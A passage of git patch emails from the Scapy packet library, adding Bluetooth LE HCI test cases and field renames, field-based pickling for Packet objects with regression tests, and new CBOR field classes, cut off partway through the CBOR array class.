@@ def send_command(self, cmd): self.send(cmd) while True: r = self.recv() - if r.type == 0x04 and r.code == 0xe and r.opcode == opcode: - if r.status != 0: + if r.type == 0x04 and r.code in (0xe, 0xf) and r.opcode == opcode: + if hasattr(r, 'status') and r.status != 0: raise BluetoothCommandError("Command %x failed with %x" % (opcode, r.status)) # noqa: E501 return r diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 9df33f0126b..124cc974b51 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -239,13 +239,55 @@ assert response[HCI_Cmd_Complete_Read_Local_Extended_Features].max_page == 2 assert response[HCI_Cmd_Complete_Read_Local_Extended_Features].extended_features == 0 assert response.answers(cmd) += LE Set Extended Scan Parameters + +cmd = HCI_Hdr(hex_bytes("0141200d00010500600060000020012001")) +assert HCI_Command_Hdr in cmd +assert cmd[HCI_Command_Hdr].ogf == 0x08 +assert cmd[HCI_Command_Hdr].ocf == 0x41 +assert cmd[HCI_Command_Hdr].len == 13 +assert HCI_Cmd_LE_Set_Extended_Scan_Parameters in cmd +scan = cmd[HCI_Cmd_LE_Set_Extended_Scan_Parameters] +assert scan.own_address_type == 0 +assert scan.scanning_filter_policy == 1 +assert scan.scanning_phys == 5 +assert scan.scan_type_1m == 0 +assert scan.scan_interval_1m == 96 +assert scan.scan_window_1m == 96 +assert scan.scan_type_coded == 0 +assert scan.scan_interval_coded == 288 +assert scan.scan_window_coded == 288 + += LE Extended Create Connection + +cmd = HCI_Hdr(hex_bytes("0143201a000001AABBCCDDEEFF01600060001800280000002a0000000000")) +assert HCI_Command_Hdr in cmd +assert cmd[HCI_Command_Hdr].ogf == 0x08 +assert cmd[HCI_Command_Hdr].ocf == 0x43 +assert cmd[HCI_Command_Hdr].len == 26 +assert HCI_Cmd_LE_Extended_Create_Connection in cmd +conn = cmd[HCI_Cmd_LE_Extended_Create_Connection] +assert conn.filter_policy == 0 +assert conn.address_type == 0 +assert conn.peer_addr_type == 1 +assert conn.peer_addr == "ff:ee:dd:cc:bb:aa" +assert conn.phys == 1 +assert conn.interval_1m == 96 +assert conn.window_1m == 96 +assert conn.min_interval_1m == 24 +assert conn.max_interval_1m == 40 +assert conn.latency_1m == 0 +assert conn.timeout_1m == 42 +assert conn.min_ce_1m == 0 +assert conn.max_ce_1m == 0 + = LE Create Connection # Request data cmd = HCI_Hdr(hex_bytes("010d2019600060000001123456677890001800280000002a0000000000")) assert HCI_Cmd_LE_Create_Connection in cmd -assert cmd[HCI_Cmd_LE_Create_Connection].paddr == '90:78:67:56:34:12' -assert cmd[HCI_Cmd_LE_Create_Connection].patype == 1 +assert cmd[HCI_Cmd_LE_Create_Connection].peer_addr == '90:78:67:56:34:12' +assert cmd[HCI_Cmd_LE_Create_Connection].peer_addr_type == 1 # Response data pending = HCI_Hdr(hex_bytes("040f0400020d20")) @@ -253,7 +295,7 @@ assert pending.answers(cmd) complete = HCI_Hdr(hex_bytes("043e1301020000000112345667789000000000000000")) assert HCI_LE_Meta_Connection_Complete in complete -assert complete[HCI_LE_Meta_Connection_Complete].paddr == '90:78:67:56:34:12' +assert complete[HCI_LE_Meta_Connection_Complete].peer_addr == '90:78:67:56:34:12' assert complete.answers(cmd) # Invalid combinations @@ -375,6 +417,18 @@ assert evt_pkt[HCI_Event_Read_Remote_Version_Information_Complete].version == 0x assert evt_pkt[HCI_Event_Read_Remote_Version_Information_Complete].manufacturer_name == 0x02b0 assert evt_pkt[HCI_Event_Read_Remote_Version_Information_Complete].subversion == 1068 += Command Complete LE Set Extended Scan Enable +evt_raw_data = hex_bytes("040e0402422000") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_Hdr in evt_pkt +assert evt_pkt[HCI_Event_Hdr].code == 0x0E +assert evt_pkt[HCI_Event_Hdr].len == 4 +assert HCI_Event_Command_Complete in evt_pkt +evt = evt_pkt[HCI_Event_Command_Complete] +assert evt.number == 2 +assert evt.opcode == 0x2042 +assert evt.status == 0 + = Command Complete evt_raw_data = hex_bytes("040e0a010b04002587ceedd668") evt_pkt = HCI_Hdr(evt_raw_data) @@ -447,6 +501,55 @@ evt_pkt = HCI_Hdr(evt_raw_data) assert HCI_Event_LE_Meta in evt_pkt assert evt_pkt[HCI_Event_LE_Meta].event == 0x14 += LE Meta Extended Advertising Report +evt_raw_data = hex_bytes("043e390d01100001AABBCCDDEEFF0100ff7fa60000000000000000001f1eff06000100000031") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_Hdr in evt_pkt +assert evt_pkt[HCI_Event_Hdr].code == 0x3E +assert evt_pkt[HCI_Event_Hdr].len == 57 +assert HCI_LE_Meta_Extended_Advertising_Report in evt_pkt +assert evt_pkt.num_reports == 1 +report = evt_pkt[HCI_LE_Meta_Extended_Advertising_Report] +assert report.reserved0 == 0 +assert report.data_status == 0 +assert report.legacy == 1 +assert report.scan_response == 0 +assert report.directed == 0 +assert report.scannable == 0 +assert report.connectable == 0 +assert report.reserved == 0 +assert report.addr_type == 1 +assert report.addr == "ff:ee:dd:cc:bb:aa" +assert report.primary_phy == 1 +assert report.secondary_phy == 0 +assert report.advertising_sid == 255 +assert report.tx_power == 127 +assert report.rssi == -90 +assert report.periodic_advertising_interval == 0 +assert report.direct_addr_type == 0 +assert report.direct_addr == "00:00:00:00:00:00" +assert report.data_length == 31 + += LE Meta Enhanced Connection Complete +evt_raw_data = hex_bytes("043e1f0a0010000001AABBCCDDEEFF000000000000000000000000240000002a0000") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_Hdr in evt_pkt +assert evt_pkt[HCI_Event_Hdr].code == 0x3E +assert evt_pkt[HCI_Event_Hdr].len == 31 +assert HCI_LE_Meta_Enhanced_Connection_Complete in evt_pkt +evt = evt_pkt[HCI_LE_Meta_Enhanced_Connection_Complete] +assert evt.status == 0 +assert evt.handle == 16 +assert evt.role == 0 +assert evt.peer_addr_type == 1 +assert evt.peer_addr == "ff:ee:dd:cc:bb:aa" +assert evt.local_rpa == "00:00:00:00:00:00" +assert evt.peer_rpa == "00:00:00:00:00:00" +assert evt.interval == 36 +assert evt.latency == 0 +assert evt.supervision == 42 +assert evt.master_clock_accuracy == 0x0 + = LE Connection Update Event evt_raw_data = hex_bytes("043e0a03004800140001003c00") evt_pkt = HCI_Hdr(evt_raw_data) @@ -608,8 +711,8 @@ assert raw(p[EIR_ServiceData16BitUUID].payload) == hex_bytes("e6c2") = Basic L2CAP dissect a = L2CAP_Hdr(b'\x08\x00\x06\x00\t\x00\xf6\xe5\xd4\xc3\xb2\xa1') -assert a[SM_Identity_Address_Information].address == 'a1:b2:c3:d4:e5:f6' -assert a[SM_Identity_Address_Information].atype == 0 +assert a[SM_Identity_Address_Information].addr == 'a1:b2:c3:d4:e5:f6' +assert a[SM_Identity_Address_Information].addr_type == 0 a.show() = Basic HCI_ACL_Hdr build & dissect @@ -723,8 +826,8 @@ a = HCI_Hdr()/HCI_Event_Hdr()/HCI_Event_LE_Meta()/HCI_LE_Meta_Extended_Advertisi #event_type = 0x0012, scannable = 1, legacy = 1, - address_type = 0x01, - address="a1:b2:c3:d4:e5:f6", + addr_type = 0x01, + addr="a1:b2:c3:d4:e5:f6", primary_phy = 1, rssi = -85, data=[ @@ -741,8 +844,8 @@ a = HCI_Hdr()/HCI_Event_Hdr()/HCI_Event_LE_Meta()/HCI_LE_Meta_Extended_Advertisi scannable = 1, scan_response = 1, legacy = 1, - address_type = 0x01, - address="a1:b2:c3:d4:e5:f6", + addr_type = 0x01, + addr="a1:b2:c3:d4:e5:f6", primary_phy = 1, rssi = -85, data=[ @@ -759,7 +862,7 @@ b = HCI_Hdr(raw(a)) b.show() assert b[HCI_Event_Hdr].len > 0 assert b[HCI_LE_Meta_Extended_Advertising_Reports].num_reports == 2 -assert b[HCI_LE_Meta_Extended_Advertising_Report][0].address == "a1:b2:c3:d4:e5:f6" +assert b[HCI_LE_Meta_Extended_Advertising_Report][0].addr == "a1:b2:c3:d4:e5:f6" assert b[HCI_LE_Meta_Extended_Advertising_Report][0].tx_power == 0x7f assert b[HCI_LE_Meta_Extended_Advertising_Report][0].rssi == -85 assert b[HCI_LE_Meta_Extended_Advertising_Report][0].data_length > 0 From 2e7c97fedb447d96e7ede231116d9ce3a5695968 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Fri, 10 Apr 2026 21:48:45 +0200 Subject: [PATCH 1620/1632] Pickle - reconstructs the packet from field values, payload and metadata (#4919) * Pickle - reconstructs the packet from field valies, payload and metadata * Pickle - support extra slots --- scapy/packet.py | 87 +++++++++++++++++++++++++++++---------------- test/regression.uts | 68 +++++++++++++++++++++++++++++++++++ 2 files changed, 125 insertions(+), 30 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index 3fb2eac6d92..f75b6e43991 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -214,15 +214,6 @@ def __init__(self, else: self.post_transforms = [post_transform] - _PickleType = Tuple[ - Union[EDecimal, float], - Optional[Union[EDecimal, float, None]], - Optional[int], - Optional[_GlobInterfaceType], - Optional[int], - Optional[bytes], - ] - @property def comment(self): # type: () -> Optional[bytes] @@ -243,28 +234,64 @@ def comment(self, value): else: self.comments = None + @classmethod + def _rebuild_pkt( + cls, # type: Type[Packet] + fields, # type: Dict[str, Any] + payload, # type: Optional[Packet] + metadata, # type: Dict[str, Any] + extra_slots={}, # type: Dict[str, Any] + ): + # type: (...) -> Packet + """Helper for unpickling Packet instances via field values.""" + # Create the instance using the field values + pkt = cls(**fields) + if payload is not None: + pkt.add_payload(payload) + # Restore metadata + pkt.time = metadata['time'] + pkt.sent_time = metadata['sent_time'] + pkt.direction = metadata['direction'] + pkt.sniffed_on = metadata['sniffed_on'] + pkt.wirelen = metadata['wirelen'] + pkt.comments = metadata['comments'] + # Restore any extra __slots__ defined by subclasses + for attr, value in extra_slots.items(): + setattr(pkt, attr, value) + return pkt + def __reduce__(self): - # type: () -> Tuple[Type[Packet], Tuple[bytes], Packet._PickleType] - """Used by pickling methods""" - return (self.__class__, (self.build(),), ( - self.time, - self.sent_time, - self.direction, - self.sniffed_on, - self.wirelen, - self.comment - )) - - def __setstate__(self, state): - # type: (Packet._PickleType) -> Packet - """Rebuild state using pickable methods""" - self.time = state[0] - self.sent_time = state[1] - self.direction = state[2] - self.sniffed_on = state[3] - self.wirelen = state[4] - self.comment = state[5] - return self + # type: () -> Tuple[Any, ...] + """Used by pickling methods. + + Reconstructs the packet from field values, payload, and metadata. + """ + # Store field values for unpickling + fields = {} + for f in self.fields_desc: + if f.name in self.fields: + fields[f.name] = self.fields[f.name] + payload = self.payload # type: Optional[Packet] + if isinstance(payload, NoPayload): + payload = None + # Store metadata for unpickling + metadata = { + 'time': self.time, + 'sent_time': self.sent_time, + 'direction': self.direction, + 'sniffed_on': self.sniffed_on, + 'wirelen': self.wirelen, + 'comments': self.comments, + } + # Collect any extra __slots__ defined by subclasses + extra_slots = {} + for attr in type(self).__all_slots__ - set(Packet.__slots__): + if hasattr(self, attr): + extra_slots[attr] = getattr(self, attr) + return ( + type(self)._rebuild_pkt, + (fields, payload, metadata, extra_slots), + ) def __deepcopy__(self, memo, # type: Any diff --git a/test/regression.uts b/test/regression.uts index af7738a41e0..3c055f831f7 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -616,6 +616,74 @@ c = pickle.loads(b) assert c[IP].dst == "192.168.0.1" assert raw(c) == raw(a) += Pickle preserves field values, payload and metadata + +import pickle + +p = IP(src='1.2.3.4', dst='5.6.7.8')/TCP(sport=1234, dport=80, flags='S') +p.time = 12345.0 +p.sent_time = 12346.0 +p.direction = 1 +p.sniffed_on = 'eth0' +p.wirelen = 100 +p.comment = b'test comment' +p2 = pickle.loads(pickle.dumps(p)) +assert p2[IP].src == '1.2.3.4' +assert p2[IP].dst == '5.6.7.8' +assert p2[TCP].sport == 1234 +assert p2[TCP].dport == 80 +assert p2[TCP].flags == 'S' +assert p2[IP].len is None +assert p2[IP].chksum is None +assert p2[TCP].chksum is None +assert p2.time == 12345.0 +assert p2.sent_time == 12346.0 +assert p2.direction == 1 +assert p2.sniffed_on == 'eth0' +assert p2.wirelen == 100 +assert p2.comment == b'test comment' +assert raw(p2) == raw(p) + += Pickle a bare packet without payload + +import pickle + +p = IP(src='10.0.0.1') +p2 = pickle.loads(pickle.dumps(p)) +assert p2.src == '10.0.0.1' +assert raw(p2) == raw(p) + += Pickle preserves custom __slots__ from subclasses + +import pickle +import scapy.packet as _pkt_mod + +class _PickleTestPacket(Packet): + __slots__ = ["custom_id", "custom_tag"] + name = "PickleTestPacket" + fields_desc = [ByteField("val", 0)] + +# Make the class discoverable by pickle +_pkt_mod._PickleTestPacket = _PickleTestPacket +_PickleTestPacket.__module__ = 'scapy.packet' + +p = _PickleTestPacket(val=42) +p.custom_id = 0x123 +p.custom_tag = "hello" +p2 = pickle.loads(pickle.dumps(p)) +assert p2.val == 42 +assert p2.custom_id == 0x123 +assert p2.custom_tag == "hello" + +# Slots not explicitly set are not serialized +p3 = _PickleTestPacket(val=7) +assert not hasattr(p3, 'custom_id') +p4 = pickle.loads(pickle.dumps(p3)) +assert p4.val == 7 +assert not hasattr(p4, 'custom_id') + +del _pkt_mod._PickleTestPacket + = Usage test from scapy.main import _usage From c4064de30acd268e4167bc90ba967b8f0aa3bb55 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 12 Apr 2026 20:02:23 +0200 Subject: [PATCH 1621/1632] Add CBOR fields (cborfields.py, cborpacket.py) and tests (#4958) * Add CBOR fields (cborfields.py, cborpacket.py) and tests * Remove unused CBOR fields and codecs from cborfields.py --------- Co-authored-by: Nils Weiss --- scapy/cbor/__init__.py | 41 + scapy/cbor/cborfields.py | 904 +++++++++++ scapy/cborpacket.py | 65 + test/scapy/layers/cbor.uts | 2957 ++++++++++++++++++++++++++++++++++++ 4 files changed, 3967 insertions(+) create mode 100644 scapy/cbor/cborfields.py create mode 100644 scapy/cborpacket.py diff --git a/scapy/cbor/__init__.py b/scapy/cbor/__init__.py index de462e74528..dcec5d8ed5d 100644 --- a/scapy/cbor/__init__.py +++ b/scapy/cbor/__init__.py @@ -44,6 +44,26 @@ CBORcodec_SIMPLE_AND_FLOAT, ) +from scapy.cbor.cborfields import ( + CBORF_element, + CBORF_field, + CBORF_UNSIGNED_INTEGER, + CBORF_NEGATIVE_INTEGER, + CBORF_INTEGER, + CBORF_BYTE_STRING, + CBORF_TEXT_STRING, + CBORF_BOOLEAN, + CBORF_NULL, + CBORF_UNDEFINED, + CBORF_FLOAT, + CBORF_ARRAY, + CBORF_ARRAY_OF, + CBORF_MAP, + CBORF_SEMANTIC_TAG, + CBORF_optional, + CBORF_PACKET, +) + __all__ = [ # Exceptions "CBOR_Error", @@ -81,4 +101,25 @@ "CBORcodec_MAP", "CBORcodec_SEMANTIC_TAG", "CBORcodec_SIMPLE_AND_FLOAT", + # Field base classes + "CBORF_element", + "CBORF_field", + # Scalar fields + "CBORF_UNSIGNED_INTEGER", + "CBORF_NEGATIVE_INTEGER", + "CBORF_INTEGER", + "CBORF_BYTE_STRING", + "CBORF_TEXT_STRING", + "CBORF_BOOLEAN", + "CBORF_NULL", + "CBORF_UNDEFINED", + "CBORF_FLOAT", + # Structured fields + "CBORF_ARRAY", + "CBORF_ARRAY_OF", + "CBORF_MAP", + "CBORF_SEMANTIC_TAG", + # Complex fields + "CBORF_optional", + "CBORF_PACKET", ] diff --git a/scapy/cbor/cborfields.py b/scapy/cbor/cborfields.py new file mode 100644 index 00000000000..536424728ec --- /dev/null +++ b/scapy/cbor/cborfields.py @@ -0,0 +1,904 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + +""" +Classes that implement CBOR (Concise Binary Object Representation) data +structures as packet fields. Modelled after scapy/asn1fields.py. +""" + +import copy + +from functools import reduce + +from scapy.cbor.cbor import ( + CBOR_Decoding_Error, + CBOR_Error, + CBOR_MajorTypes, + CBOR_Object, + CBOR_UNSIGNED_INTEGER, + CBOR_NEGATIVE_INTEGER, + CBOR_BYTE_STRING, + CBOR_TEXT_STRING, + CBOR_SEMANTIC_TAG, + CBOR_FALSE, + CBOR_TRUE, + CBOR_NULL, + CBOR_UNDEFINED, + CBOR_FLOAT, +) +from scapy.cbor.cborcodec import ( + CBOR_Codec_Decoding_Error, + CBOR_decode_head, + CBOR_encode_head, + CBORcodec_Object, + CBORcodec_UNSIGNED_INTEGER, + CBORcodec_NEGATIVE_INTEGER, + CBORcodec_BYTE_STRING, + CBORcodec_TEXT_STRING, + CBORcodec_SIMPLE_AND_FLOAT, +) +from scapy.base_classes import BasePacket +from scapy.volatile import ( + RandChoice, + RandFloat, + RandNum, + RandString, + RandField, +) + +from scapy import packet + +from typing import ( + Any, + Dict, + Generic, + List, + Optional, + Tuple, + Type, + TypeVar, + Union, + cast, + TYPE_CHECKING, +) + +if TYPE_CHECKING: + from scapy.cborpacket import CBOR_Packet # noqa: F401 + + +class CBORF_badsequence(Exception): + pass + + +class CBORF_element(object): + pass + + +########################## +# Basic CBOR Field # +########################## + +_I = TypeVar('_I') # Internal storage +_A = TypeVar('_A') # CBOR object + + +class CBORF_field(CBORF_element, Generic[_I, _A]): + holds_packets = 0 + islist = 0 + CBOR_tag = None # type: Optional[Any] + + def __init__(self, + name, # type: str + default, # type: Optional[_A] + ): + # type: (...) -> None + self.name = name + if default is None: + self.default = default # type: Optional[_A] + else: + self.default = self._wrap(default) + self.owners = [] # type: List[Type[CBOR_Packet]] + + def _wrap(self, val): + # type: (Any) -> _A + """Return a CBOR object wrapping *val*. + + The base implementation is a pass-through cast; subclasses override + this to convert a raw Python value to the appropriate CBOR object + type (e.g. :class:`~scapy.cbor.cbor.CBOR_UNSIGNED_INTEGER`). + """ + return cast(_A, val) + + def register_owner(self, cls): + # type: (Type[CBOR_Packet]) -> None + self.owners.append(cls) + + def i2repr(self, pkt, x): + # type: (CBOR_Packet, _I) -> str + return repr(x) + + def i2h(self, pkt, x): + # type: (CBOR_Packet, _I) -> Any + return x + + def m2i(self, pkt, s): + # type: (CBOR_Packet, bytes) -> Tuple[_A, bytes] + raise NotImplementedError("Subclasses must implement m2i") + + def i2m(self, pkt, x): + # type: (CBOR_Packet, Union[bytes, _I, _A]) -> bytes + if x is None: + return b"" + if isinstance(x, CBOR_Object): + return x.enc() + return self._encode(x) + + def _encode(self, x): + # type: (Any) -> bytes + """Encode a raw Python value to CBOR bytes.""" + raise NotImplementedError("Subclasses must implement _encode") + + def any2i(self, pkt, x): + # type: (CBOR_Packet, Any) -> _I + return cast(_I, x) + + def extract_packet(self, + cls, # type: Type[CBOR_Packet] + s, # type: bytes + _underlayer=None, # type: Optional[CBOR_Packet] + ): + # type: (...) -> Tuple[CBOR_Packet, bytes] + try: + c = cls(s, _underlayer=_underlayer) + except CBORF_badsequence: + c = packet.Raw(s, _underlayer=_underlayer) # type: ignore + cpad = c.getlayer(packet.Raw) + s = b"" + if cpad is not None: + s = cpad.load + if cpad.underlayer: + del cpad.underlayer.payload + return c, s + + def build(self, pkt): + # type: (CBOR_Packet) -> bytes + return self.i2m(pkt, getattr(pkt, self.name)) + + def dissect(self, pkt, s): + # type: (CBOR_Packet, bytes) -> bytes + v, s = self.m2i(pkt, s) + self.set_val(pkt, v) + return s + + def do_copy(self, x): + # type: (Any) -> Any + if isinstance(x, list): + x = x[:] + for i in range(len(x)): + if isinstance(x[i], BasePacket): + x[i] = x[i].copy() + return x + if hasattr(x, "copy"): + return x.copy() + return x + + def set_val(self, pkt, val): + # type: (CBOR_Packet, Any) -> None + setattr(pkt, self.name, val) + + def is_empty(self, pkt): + # type: (CBOR_Packet) -> bool + return getattr(pkt, self.name) is None + + def get_fields_list(self): + # type: () -> List[CBORF_field[Any, Any]] + return [self] + + def __str__(self): + # type: () -> str + return repr(self) + + def randval(self): + # type: () -> RandField[_I] + return cast(RandField[_I], RandNum(0, 2 ** 32)) + + def copy(self): + # type: () -> CBORF_field[_I, _A] + return copy.copy(self) + + +############################# +# Simple CBOR Fields # +############################# + +class CBORF_UNSIGNED_INTEGER(CBORF_field[int, CBOR_UNSIGNED_INTEGER]): + """CBOR unsigned integer field (major type 0).""" + CBOR_tag = CBOR_MajorTypes.UNSIGNED_INTEGER + + def _wrap(self, val): + # type: (Any) -> CBOR_UNSIGNED_INTEGER + if isinstance(val, CBOR_UNSIGNED_INTEGER): + return val + return CBOR_UNSIGNED_INTEGER(int(val)) + + def m2i(self, pkt, s): + # type: (CBOR_Packet, bytes) -> Tuple[CBOR_UNSIGNED_INTEGER, bytes] + return CBORcodec_UNSIGNED_INTEGER.dec(s) # type: ignore + + def _encode(self, x): + # type: (Any) -> bytes + return CBORcodec_UNSIGNED_INTEGER.enc( + x if isinstance(x, CBOR_Object) else CBOR_UNSIGNED_INTEGER(int(x)) + ) + + def randval(self): + # type: () -> RandNum + return RandNum(0, 2 ** 64 - 1) + + +class CBORF_NEGATIVE_INTEGER(CBORF_field[int, CBOR_NEGATIVE_INTEGER]): + """CBOR negative integer field (major type 1).""" + CBOR_tag = CBOR_MajorTypes.NEGATIVE_INTEGER + + def _wrap(self, val): + # type: (Any) -> CBOR_NEGATIVE_INTEGER + if isinstance(val, CBOR_NEGATIVE_INTEGER): + return val + return CBOR_NEGATIVE_INTEGER(int(val)) + + def m2i(self, pkt, s): + # type: (CBOR_Packet, bytes) -> Tuple[CBOR_NEGATIVE_INTEGER, bytes] + return CBORcodec_NEGATIVE_INTEGER.dec(s) # type: ignore + + def _encode(self, x): + # type: (Any) -> bytes + return CBORcodec_NEGATIVE_INTEGER.enc( + x if isinstance(x, CBOR_Object) else CBOR_NEGATIVE_INTEGER(int(x)) + ) + + def randval(self): + # type: () -> RandNum + return RandNum(-2 ** 64, -1) + + +class CBORF_INTEGER(CBORF_field[int, + Union[CBOR_UNSIGNED_INTEGER, + CBOR_NEGATIVE_INTEGER]]): + """CBOR integer field handling both positive and negative values.""" + + def _wrap(self, val): + # type: (Any) -> Union[CBOR_UNSIGNED_INTEGER, CBOR_NEGATIVE_INTEGER] + if isinstance(val, (CBOR_UNSIGNED_INTEGER, CBOR_NEGATIVE_INTEGER)): + return val + i = int(val) + if i >= 0: + return CBOR_UNSIGNED_INTEGER(i) + return CBOR_NEGATIVE_INTEGER(i) + + def m2i(self, pkt, s): + # type: (CBOR_Packet, bytes) -> Tuple[Union[CBOR_UNSIGNED_INTEGER, CBOR_NEGATIVE_INTEGER], bytes] # noqa: E501 + if not s: + raise CBOR_Decoding_Error("Empty CBOR data") + major_type = (s[0] >> 5) & 0x7 + if major_type == 0: + return CBORcodec_UNSIGNED_INTEGER.dec(s) # type: ignore + elif major_type == 1: + return CBORcodec_NEGATIVE_INTEGER.dec(s) # type: ignore + raise CBOR_Decoding_Error( + "Expected integer (major type 0 or 1), got %d" % major_type) + + def i2m(self, pkt, x): + # type: (CBOR_Packet, Any) -> bytes + if x is None: + return b"" + if isinstance(x, CBOR_Object): + return x.enc() + i = int(x) + if i >= 0: + return CBORcodec_UNSIGNED_INTEGER.enc(CBOR_UNSIGNED_INTEGER(i)) + return CBORcodec_NEGATIVE_INTEGER.enc(CBOR_NEGATIVE_INTEGER(i)) + + def randval(self): + # type: () -> RandNum + return RandNum(-2 ** 64, 2 ** 64 - 1) + + +class CBORF_BYTE_STRING(CBORF_field[bytes, CBOR_BYTE_STRING]): + """CBOR byte string field (major type 2).""" + CBOR_tag = CBOR_MajorTypes.BYTE_STRING + + def _wrap(self, val): + # type: (Any) -> CBOR_BYTE_STRING + if isinstance(val, CBOR_BYTE_STRING): + return val + return CBOR_BYTE_STRING(bytes(val)) + + def m2i(self, pkt, s): + # type: (CBOR_Packet, bytes) -> Tuple[CBOR_BYTE_STRING, bytes] + return CBORcodec_BYTE_STRING.dec(s) # type: ignore + + def _encode(self, x): + # type: (Any) -> bytes + return CBORcodec_BYTE_STRING.enc( + x if isinstance(x, CBOR_Object) else CBOR_BYTE_STRING(bytes(x)) + ) + + def randval(self): + # type: () -> RandString + return RandString(RandNum(0, 1000)) + + +class CBORF_TEXT_STRING(CBORF_field[str, CBOR_TEXT_STRING]): + """CBOR text string field (major type 3).""" + CBOR_tag = CBOR_MajorTypes.TEXT_STRING + + def _wrap(self, val): + # type: (Any) -> CBOR_TEXT_STRING + if isinstance(val, CBOR_TEXT_STRING): + return val + return CBOR_TEXT_STRING(str(val)) + + def m2i(self, pkt, s): + # type: (CBOR_Packet, bytes) -> Tuple[CBOR_TEXT_STRING, bytes] + return CBORcodec_TEXT_STRING.dec(s) # type: ignore + + def _encode(self, x): + # type: (Any) -> bytes + return CBORcodec_TEXT_STRING.enc( + x if isinstance(x, CBOR_Object) else CBOR_TEXT_STRING(str(x)) + ) + + def randval(self): + # type: () -> RandString + return RandString(RandNum(0, 1000)) + + +class CBORF_BOOLEAN(CBORF_field[bool, Union[CBOR_FALSE, CBOR_TRUE]]): + """CBOR boolean field (major type 7, simple values 20/21).""" + CBOR_tag = CBOR_MajorTypes.SIMPLE_AND_FLOAT + + def _wrap(self, val): + # type: (Any) -> Union[CBOR_FALSE, CBOR_TRUE] + if isinstance(val, (CBOR_FALSE, CBOR_TRUE)): + return val + return CBOR_TRUE() if val else CBOR_FALSE() + + def m2i(self, pkt, s): + # type: (CBOR_Packet, bytes) -> Tuple[Union[CBOR_FALSE, CBOR_TRUE], bytes] + obj, remain = CBORcodec_SIMPLE_AND_FLOAT.dec(s) + if not isinstance(obj, (CBOR_FALSE, CBOR_TRUE)): + raise CBOR_Decoding_Error( + "Expected boolean (CBOR_FALSE or CBOR_TRUE), got %r" % obj) + return obj, remain # type: ignore + + def i2m(self, pkt, x): + # type: (CBOR_Packet, Any) -> bytes + if x is None: + return b"" + if isinstance(x, (CBOR_FALSE, CBOR_TRUE)): + return x.enc() + return CBORcodec_SIMPLE_AND_FLOAT.enc( + CBOR_TRUE() if x else CBOR_FALSE() + ) + + def randval(self): + # type: () -> RandChoice + return RandChoice(True, False) + + +class CBORF_NULL(CBORF_field[None, CBOR_NULL]): + """CBOR null field (major type 7, simple value 22).""" + CBOR_tag = CBOR_MajorTypes.SIMPLE_AND_FLOAT + + def __init__(self, + name, # type: str + default=None, # type: None + ): + # type: (...) -> None + super(CBORF_NULL, self).__init__(name, None) + + def _wrap(self, val): + # type: (Any) -> CBOR_NULL + return CBOR_NULL() + + def m2i(self, pkt, s): + # type: (CBOR_Packet, bytes) -> Tuple[CBOR_NULL, bytes] + obj, remain = CBORcodec_SIMPLE_AND_FLOAT.dec(s) + if not isinstance(obj, CBOR_NULL): + raise CBOR_Decoding_Error( + "Expected null, got %r" % obj) + return obj, remain # type: ignore + + def i2m(self, pkt, x): + # type: (CBOR_Packet, Any) -> bytes + return CBOR_NULL().enc() + + def is_empty(self, pkt): + # type: (CBOR_Packet) -> bool + return False + + +class CBORF_UNDEFINED(CBORF_field[None, CBOR_UNDEFINED]): + """CBOR undefined field (major type 7, simple value 23).""" + CBOR_tag = CBOR_MajorTypes.SIMPLE_AND_FLOAT + + def __init__(self, + name, # type: str + default=None, # type: None + ): + # type: (...) -> None + super(CBORF_UNDEFINED, self).__init__(name, None) + + def _wrap(self, val): + # type: (Any) -> CBOR_UNDEFINED + return CBOR_UNDEFINED() + + def m2i(self, pkt, s): + # type: (CBOR_Packet, bytes) -> Tuple[CBOR_UNDEFINED, bytes] + obj, remain = CBORcodec_SIMPLE_AND_FLOAT.dec(s) + if not isinstance(obj, CBOR_UNDEFINED): + raise CBOR_Decoding_Error( + "Expected undefined, got %r" % obj) + return obj, remain # type: ignore + + def i2m(self, pkt, x): + # type: (CBOR_Packet, Any) -> bytes + return CBOR_UNDEFINED().enc() + + def is_empty(self, pkt): + # type: (CBOR_Packet) -> bool + return False + + +class CBORF_FLOAT(CBORF_field[float, CBOR_FLOAT]): + """CBOR float field (major type 7, double precision).""" + CBOR_tag = CBOR_MajorTypes.SIMPLE_AND_FLOAT + + def _wrap(self, val): + # type: (Any) -> CBOR_FLOAT + if isinstance(val, CBOR_FLOAT): + return val + return CBOR_FLOAT(float(val)) + + def m2i(self, pkt, s): + # type: (CBOR_Packet, bytes) -> Tuple[CBOR_FLOAT, bytes] + obj, remain = CBORcodec_SIMPLE_AND_FLOAT.dec(s) + if not isinstance(obj, CBOR_FLOAT): + raise CBOR_Decoding_Error( + "Expected float, got %r" % obj) + return obj, remain # type: ignore + + def i2m(self, pkt, x): + # type: (CBOR_Packet, Any) -> bytes + if x is None: + return b"" + if isinstance(x, CBOR_FLOAT): + return x.enc() + return CBORcodec_SIMPLE_AND_FLOAT.enc(CBOR_FLOAT(float(x))) + + def randval(self): + # type: () -> RandFloat + return RandFloat(0, 2 ** 32) + + +############################## +# Structured CBOR Fields # +############################## + +class CBORF_ARRAY(CBORF_field[List[Any], List[Any]]): + """ + CBOR array with a fixed sequence of named, typed fields (major type 4). + Analogous to ASN1F_SEQUENCE: each positional element corresponds to a + specific CBORF_field. The CBOR array count must match the number of + declared fields. + + Example:: + + class MyCBOR(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER("version", 1), + CBORF_TEXT_STRING("name", ""), + ) + """ + CBOR_tag = CBOR_MajorTypes.ARRAY + holds_packets = 1 + + def __init__(self, *seq, **kwargs): + # type: (*Any, **Any) -> None + # The array itself is a structural field without its own named slot on + # the packet; a placeholder name is used so the base class __init__ + # stays happy. Individual element fields are the ones that carry names. + name = "_cbor_array" + default = [field.default for field in seq] + super(CBORF_ARRAY, self).__init__(name, None) + self.default = default + self.seq = seq + self.islist = len(seq) > 1 + + def __repr__(self): + # type: () -> str + return 